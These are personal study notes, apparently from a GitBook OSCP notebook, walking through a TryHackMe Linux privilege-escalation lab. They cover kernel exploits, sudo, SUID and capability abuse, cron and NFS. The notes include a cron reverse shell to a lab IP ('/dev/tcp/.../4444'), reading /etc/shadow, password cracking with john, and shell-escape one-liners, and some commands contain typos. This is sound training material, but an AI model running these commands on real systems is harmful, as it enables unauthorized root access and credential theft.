0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • Abdelrahman Ali Abdelaziz
  • In privilege escalations, there are two types of privilege escalations
  • Enumeration
  • initial Access
  • privEsc
  • programs that the user can sudo
  • Limited capabilities
  • Privilege Escalation: PATH
  • Privilege Escalation: NFS
  • Capstone Project
  • Enumeration
  • unshadow
  • su missy
  • check the sudo
  • Exploit Resources
  • other Resources
  1. offensive security
  2. OSCP
  3. WriteUps
  4. THM
  5. Walkthroughs

LineKernel

PreviousAttacktive DirectoryNextDay 1 — Linux PrivEsc

Last updated 9 months ago

Abdelrahman Ali Abdelaziz

Privilege escalation occurs when a computer user exploits system vulnerabilities or misconfigurations to gain access to other user accounts within a computer system. By obtaining access to these accounts, they can access additional files and execute administrative commands.

In privilege escalations, there are two types of privilege escalations

1. Vertical privilege escalation.

2. Horizontal privilege escalation.

Enumeration

The hostname command will return the hostname of the target machine

hostname 
or
uname -n

To get the Linux Kernel Version Use uname -r

uname -r 

python version

python -V
cat /etc/issuse

initial Access

The kernel is the central program within a computer's operating system, holding full control over all aspects of the system. It is the part of the operating system that always remains in memory, enabling communication between hardware and software components. Typically written in a low-level language like C, the kernel is susceptible to binary exploitation techniques, which can be used to uncover vulnerabilities.

If you want to gain privilege escalation you can search for a POC using

cat /proc/version
uname -a
searchsploit "Linux Kernel version" or search in Google site:exploit-db.com "Linux kernel version

ok I will search for the version of kernel-vulnerable

I found CVE-2015-1328

  • Ubuntu 14.04 - Linux ubuntu 3.13.0-24-generic #46-Ubuntu x86_64

gcc exploit.c -o exploit

privEsc

programs that the user can sudo

By running sudo -l we can see all the binaries a user can do. we first run sudo -l

User karen may run the following commands on ip-10-10-202-96:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
sudo less flag2.txt

To get a password Frank uses sudo less /etc/shadow

Privilege Escalation: SUID

We run the command

If the binary can lead to a privilege escalation

find / -type f -perm -04000 -ls 2>/dev/null

i searched i google to find the privisc using base64

base64 "$LFILE" | base64 --decode

unshasow

unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt

Limited capabilities

Remember

If the permission of a binary can lead to a privilege escalation

We search for this flaw using getcap.

getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

i searched i google to find the privisc using capabilities

vim -c `:py3 import os; os.setuid(0); os.excel("/bin/sh", "sh", "-c", "reset; exec sh")'

crontab

Cron => used to create job scheduling in Linux

first, check for crontab config

/etc/crontab

check all files u found check any think

We first check /karen/backup.sh

We first modify /Karen/backup.sh since we have permission

#!/bin/bash
bash -i >& /dev/tcp/10.21.32.157/4444 0>&1

chmod 777 backup.sh

#set Revers shell in attacker 
nc -nvlp 4444
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt

Privilege Escalation: PATH

find the files writeable

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=/tmp:$PATH

Privilege Escalation: NFS

Exploiting the Network File Sharing Protocol

Network File Sharing (NFS) is a protocol allowing you to share directories and files with other Linux clients over a network

cat /etc/exports

Read the _ /etc/exports _ file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.

showmount -e <you-ip>
  1. #Attacker, as root user
    gcc -static payload.c -o payload
    mkdir /tmp/pe
    mount -o rw <IP>:<SHARED_FOLDER> /tmp/pe
    cd /tmp/pe
    cp /tmp/payload
    chmod +s payload
    
    #Victim
    cd <SHAREDD_FOLDER>
    ./payload

Capstone Project

Enumeration

Find the SUID

find / -type f -perm -04000 -ls 2>/dev/null

unshadow

su missy

check the sudo

sudo -l

sudo Find

sudo find . -exec /bin/sh \; -quit

Exploit Resources

other Resources

Mounting that directory in a client machine, and as root copying inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it SUID rights, and execute from the victim machine that binary (you can find here some).

C SUID payloads
linux-kernel-exploits/2015/CVE-2015-1328 at master · SecWiki/linux-kernel-exploitsGitHub
linux-kernel-exploits/2015/CVE-2015-1328 at master · SecWiki/linux-kernel-exploitsGitHub
NFS no_root_squash/no_all_squash misconfiguration PEHackTricks
NFS no_root_squash/no_all_squash misconfiguration PEHackTricks
GTFOBins
Payloads to executeHackTricks
Logo
Logo
Logo
Logo
Logo
Logo
Hostname For wade
sudo less
Password1